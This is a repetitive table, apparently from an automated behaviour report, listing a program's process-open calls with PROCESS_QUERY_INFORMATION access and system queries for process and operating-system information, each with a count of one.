| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
